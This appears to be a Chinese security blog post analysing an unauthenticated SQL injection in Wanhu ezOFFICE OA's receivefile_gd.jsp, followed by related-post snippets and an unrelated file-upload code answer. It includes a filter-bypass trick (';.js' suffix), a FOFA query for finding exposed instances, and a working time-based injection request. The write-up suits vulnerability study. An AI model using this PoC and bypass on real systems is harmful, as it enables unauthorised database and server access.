oa中receivefile_gd存在SQL注入

原创 于 2024-10-24 01:15:00 发布 · 1.2k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #java #oracle

万户oa中receivefile_gd存在SQL注入
简介
万户OA ezofice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。万户 ezOFFICE receivefile gd.jsp 接口存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可 获取服务器权限。

漏洞分析
首先进入到modules/govoffice/gov_documentmanager/receivefile_gd.jsp下
在这里插入图片描述
在105-111行有如下代码
java.util.Map myParaTmp = new java.util.HashMap();//创建一个HashMap数组
//依次接受请求中的recordId、tableId、processId、workId参数之后放入到数组中
myParaTmp.put(“recordId”,request.getParameter(“recordId”));
myParaTmp.put(“tableId”,request.getParameter(“tableId”));
myParaTmp.put(“processId”,request.getParameter(“processId”));
myParaTmp.put(“workId”,request.getParameter(“workId”));
com.whir.ezoffice.workflow.newBD.WorkFlowButtonBD myUfbdTemp = new com.whir.ezoffice.workflow.newBD.WorkFlowButtonBD();
myUfbdTemp.delWFOnlineUser(myParaTmp);//调用delWFOnlineUser方法进行数据库相关的删除操作
需要注意的是上述代码是在else语句中,需要满足gb参数为空才可以,代码如下
在这里插入图片描述
接着进入到WorkFlowButtonBD下的delWFOnlineUser方法中
该方法首先创建了一个ParameterGenerator对象pg,之后将参数para传入到pg中,接着就是创建了一个代理类EJBProxy对象用于访问名为WorkFlowButtonEJB的EJB组件,通过反射方式调用delWFOnlineUser方法

接着进入到com.whir.ezoffice.workflow.newEJB.WorkFlowButtonEJBBean的delWFOnlineUser中
public void delWFOnlineUser(Map map) throws Exception {
begin();
try {
try {
this.stmt.execute(“delete from wf_onlineuser where recordId=” + map.get(“recordId”) + " and tableId=" + map.get(“tableId”) + " and processId=" + map.get(FormContants.WF_PROCESS_ID) + " and workId=" + map.get(“workId”));
end();
} catch (Exception e) {
System.out.println(“----------------------------------------------”);
e.printStackTrace();
System.out.println(“----------------------------------------------”);
throw e;
}
} catch (Throwable th) {
end();
throw th;
}
}

该方法就是获取map参数中recordId、tableId、FormContants.WF_PROCESS_ID、workId参数组成sql语句,之后直接调用stmt.execute方法执行sql语句,因为全程没有对sql语句进行任何敏感信息的过滤进而造成了sql

要注意的是在web.xml中会对所有的路由进行SetCharacterEncodingFilter类的过滤处理

在这里插入图片描述
进入SetCharacterEncodingFilter类中开始分析
在这里插入图片描述
首先就是rootPath获取到根目录

substring获取到整个路由

接着继续走,substring2获取到路由的后缀,当后缀名为.jspx时就会跳转到/defaultroot/login.jsp
在这里插入图片描述
当后缀匹配到如下后缀时会进行不同的重定向操作

(substring2.equals(“”) || substring2.equals(“.jsp”) || substring2.equals(“.vm”)) && this.needSecurity && substring.indexOf(“/evo/weixin/”) < 0 && substring.indexOf(“/portal/”) < 0 && substring.indexOf(“/upgrade/”) < 0 && substring.indexOf(“/public/edit/”) < 0 && !securityList.getNosessionWhiteList().contains(substring)
接着走,当请求体中有referer时,就会将取值赋值给str2,接下来就是根据z的取值以及后缀进行判断,当后缀名为.jsp;.js来访问时if结果就为false,不会直接return使得程序直接继续向下执行直到最后都没有重定向发操作直接访问到原始路由
在这里插入图片描述
因此在访问路由的时候加入;.js可以很好的绕过过滤

资产测绘
app=“万户ezOFFICE协同管理平台”
在这里插入图片描述
漏洞复现
poc
GET /defaultroot/modules/govoffice/gov_documentmanager/receivefile_gd.jsp;.js?recordId=1;waitfor+delay+‘0:0:6’–± HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml
在这里插入图片描述

【漏洞复现】万户OA-documentedit-unite-sql注入
漏洞复现
01-19 250
万户OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效提高工作效率。万户OA DocumentEdit_unite 接口存在sql注入漏洞,攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
万户ezOFFICE协同管理平台receivefile_gd.jsp sql注入复现
iSee857的博客
08-21 547
万户ezOFFICE receivefile_gd.jsp 接口处存在SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。Fofa:app="万户ezOFFICE协同管理平台"请即时从官网获取安全补丁。
【漏洞复现】万户OA-contract_gd-sql注入
漏洞复现
03-25 388
万户OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效提高工作效率。万户OA contract_gd 接口存在sql注入漏洞,攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
万户 ezOFFICE DocumentEdit.jsp SQL注入漏洞复现
0xSec
12-10 1684
万户 ezOFFICEDocumentEdit.jsp 存在SQL注入漏洞。由于'DocumentID'参数缺乏过滤,允许攻击者利用漏洞获取数据库敏感信息。
oracle sql注入绕过,万户OA某处绕过限制文件上传以及sql注入(无需登陆,通杀专业版标准版)...
weixin_36057482的博客
04-05 2693
sql注入:WooYun: 万户OA某处无限制sql注入里面的方法适用于标准版,专业版存在同样的文件但是路径不一样。defaultroot\iWebRevision.jsp\DocumentEdit.jspif (ObjConnBean.OpenConnection()) {System.out.println("OpenConnection");String Sql="Select * From...
【漏洞复现】万户 ezOFFICE协同管理平台 getAutoCode SQL注入漏洞复现(CVE-2024-18749)
网安小白
08-05 818
万户OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效提高工作效率。
万户 ezOFFICE receivefile_gd.jsp SQL注入漏洞复现
0xSec
08-21 1032
万户 ezOFFICEreceivefile_gd.jsp 接口存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
receivefile.rar_QQReceiveFile_receivefile
09-24
在本项目中,"receivefile.rar" 是一个压缩包文件,其中包含了一个名为 "QQReceiveFile" 的项目,该项目是用C#编程语言编写的,目的是模拟QQ接收文件的功能。这个程序可能是为了帮助用户理解如何在计算机网络环境中...
ftp.rar_FTP unix_c ftp_ftp c linux_linux_unix c
09-21
例如,`CreateSocket()`对应于`socket()`,`Connect()`对应于`connect()`,而`TransmitFile()`和`ReceiveFile()`可以用于文件传输。 在源代码中,可能包含了处理FTP命令的逻辑,如`USER`(登录用户)、`PASS`(密码...
Python:实现receive file接收文件功能(附完整源码)
希望我的博客,能帮上你解决学习中工作中所遇到的问题
07-22 1019
Python:实现receive file接收文件功能(附完整源码)
【漏洞复现】万户 ezOFFICE协同管理平台 getAutoCode SQL注入
今天是几号的博客
08-01 1951
万户OA ezofice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。万户 ezOFFICE getAutoCodejsp 接口处存在SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。
【1day】​万户协同办公平台 DocumentEdit_unite.jsp接口SQL注入漏洞学习
记录并分享学习安全的知识点..
10-30 787
万户协同办公平台是一款企业级的协同办公软件,旨在帮助企业提高工作效率和协同能力。该平台提供了多种功能模块,包括日程管理、任务管理、文档管理、邮件管理、审批流程等,支持多人协同操作和实时沟通。万户协同办公平台 ezoffice存在SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
万户OA漏洞分析、利用与防护
不忘初心,护天下安全!
09-29 3698
万户OA 除了 /defaultroot/officeserverservlet 接口外的另一处接口 OfficeServer.jsp 同时也存在任意文件上传漏洞,导致攻击者可上传任意文件获取服务器权限。万户OA download_ftp.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。万户OA download_old.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。2.使用防火墙等设备对所有相关poc进行检测、防护。可直接上传恶意jsp文件。
【漏洞复现】万户协同办公平台ezoffice SendFileCheckTemplateEdit.jsp接口存在SQL注入漏洞 附POC
失心少年
11-30 808
漏洞链接:http://127.0.0.1/defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!
漏洞复现-万户ezOFFICE系列
aming小老弟
03-12 2653
万户OA[+]万户协同办公平台 ezoffice存在未授权访问漏洞wanhu_office|app=“万户ezOFFICE协同管理平台”万户ezEIP。
万户ezOFFICE filesendcheck_gd.jsp SQL注入
iSee857的博客
09-10 369
万户 ezOFFICE filesendcheck_gd.jsp 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。Fofa:app="万户网络-ezOFFICE"
万户-ezOFFICE filesendcheck_gd SQL注入
一个努力学习网安的小牛马
09-11 389
万户OA-ezOFFICE filesendcheck_gd.jsp接口处存在sql注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任。
【漏洞复现】万户OA-check_onlyfield-sql注入
漏洞复现
01-19 380
万户OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效提高工作效率。万户OA check_onlyfield 接口存在sql注入漏洞,攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
2022-10-10(通达OA SQL注入漏洞)
qq_45751902的博客
10-10 2365
经过测试发现过滤了单引号,对r字符进行转换成16进制,通过手工最终获得数据库用户名root。使用手工注入,经过测试发现过滤了单引号,对r字符进行转换成16进制(用户名是root)首先创建一个普通账户 lisi:lisi123456。中存在 一个$_GET[“id”];参数位置:SORT_ID,FILE_SORT。发现时间明显变长了,再此证明id没有被过滤。登录账号是admin,密码为空。利用条件:一枚普通账号登录权限。利用条件:11.5版本无需登录。
POST http://172.18.194.141:8080/marf/receiveFile Content-Type: application/json { "fileUrl": "https://github.githubassets.com/images/modules/logos_page/GitHub-Mark.png" }在服务器中如何调用
最新发布
06-28
### 服务器端处理 POST 请求接收文件 URL 并进行操作 在服务器端接收并处理通过 HTTP POST 请求上传的文件,通常涉及解析请求体中的数据,并将接收到的文件保存到指定位置。这一过程可以通过多种编程语言和框架实现,例如 Spring Boot、Python Flask、C# ASP.NET 或 Node.js Express 等。 #### 接收文件的基本流程 1. **接收 HTTP POST 请求** 当客户端发送一个包含文件的 POST 请求时,请求头中应包含 `Content-Type: multipart/form-data`,以表明这是一个文件上传请求。服务器端需要能够识别并解析这种格式的数据[^5]。 2. **解析请求体中的文件内容** 文件通常以二进制形式传输,并被封装在 multipart 表单字段中。服务器端需要解析这些字段,并提取出文件名、文件大小及实际内容。例如,在 Spring Boot 中可以使用 `MultipartFile` 来接收文件对象[^1]。 3. **存储文件** 提取文件后,服务器需要将其写入本地磁盘或远程存储系统(如云存储服务)。文件路径、权限设置以及重命名策略也应在该步骤中处理。 4. **返回响应** 处理完成后,服务器应返回适当的 HTTP 响应码(如 200 OK)以及可选的响应体,告知客户端上传是否成功。 #### 示例代码:Spring Boot 使用 MultipartFile 接收文件 ```java @RestController public class FileUploadController { @PostMapping("/upload") public ResponseEntity<String> handleFileUpload(@RequestParam("file") MultipartFile file) { if (file.isEmpty()) { return ResponseEntity.badRequest().body("File is empty"); } try { // 获取原始文件名 String originalFilename = file.getOriginalFilename(); // 构建目标路径 Path destinationPath = Paths.get("uploads/" + originalFilename); // 写入文件 Files.write(destinationPath, file.getBytes()); return ResponseEntity.ok("File uploaded successfully: " + originalFilename); } catch (IOException e) { return ResponseEntity.status(500).body("Failed to store file"); } } } ``` 此控制器方法接收名为 `file` 的表单字段,并将其内容写入服务器上的 `uploads/` 目录下[^1]。 #### 示例代码:Python Flask 接收文件 ```python from flask import Flask, request app = Flask(__name__) @app.route('/upload', methods=['POST']) def upload_file(): if 'file' not in request.files: return 'No file part', 400 file = request.files['file'] if file.filename == '': return 'No selected file', 400 if file: filename = secure_filename(file.filename) file.save(os.path.join('uploads/', filename)) return f'File {filename} uploaded successfully', 200 ``` 此路由函数检查请求中是否存在文件,若存在则保存至 `uploads/` 目录,并使用 `secure_filename()` 防止路径遍历攻击[^2]。 #### 示例代码:Node.js Express 接收文件 使用 `multer` 中间件处理 multipart/form-data 格式: ```javascript const express = require('express'); const multer = require('multer'); const path = require('path'); const app = express(); const storage = multer.diskStorage({ destination: function (req, file, cb) { cb(null, 'uploads/'); }, filename: function (req, file, cb) { cb(null, Date.now() + '-' + file.originalname); } }); const upload = multer({ storage: storage }); app.post('/upload', upload.single('file'), (req, res) => { res.send('File uploaded successfully'); }); ``` 上述代码配置了文件存储路径与文件名生成规则,并通过中间件处理上传逻辑[^4]。 --- ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值